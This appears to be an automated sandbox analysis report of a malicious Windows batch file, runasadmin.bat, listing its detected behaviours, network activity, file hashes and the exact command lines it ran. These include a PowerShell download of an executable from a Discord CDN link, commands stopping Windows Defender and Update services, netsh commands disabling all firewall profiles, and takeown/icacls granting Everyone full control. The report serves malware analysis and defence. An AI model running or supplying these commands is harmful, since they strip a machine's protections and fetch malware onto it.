Analysis Overview
SHA256
61d3ded7796d8e1e237a9d5b29dfa3c85bd8a7b0851158683b7182c8693efc5f
Threat Level: Known bad
The file runasadmin.bat was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
Possible privilege escalation attempt
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Modifies file permissions
Launches sc.exe
Delays execution with timeout.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-22 17:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 17:43
Reported
2024-05-22 17:47
Platform
win10v2004-20240426-en
Max time kernel
31s
Max time network
34s
Command Line
Signatures
Disables service(s)
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"
C:\Windows\system32\sc.exe
sc config "wuauserv" start= disabled
C:\Windows\system32\sc.exe
sc config "TrustedInstaller" start= disabled
C:\Windows\system32\net.exe
net stop wuauserv
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
C:\Windows\system32\net.exe
net stop TrustedInstaller
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrustedInstaller
C:\Windows\system32\takeown.exe
takeown /F C:\X\Y\Z /A /R
C:\Windows\system32\icacls.exe
icacls C:\X\Y\Z /grant Everyone:F /T
C:\Windows\system32\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\system32\net.exe
net stop "Windows Defender Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
C:\Windows\system32\net.exe
net stop "Windows Firewall"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 2.17.196.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| BE | 2.17.196.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 185.196.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
Files
memory/1956-0-0x00007FFCAA423000-0x00007FFCAA425000-memory.dmp
memory/1956-1-0x000001F8CE6E0000-0x000001F8CE702000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cdywult.iq3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1956-11-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp
memory/1956-12-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp
memory/1956-15-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp
memory/1956-16-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp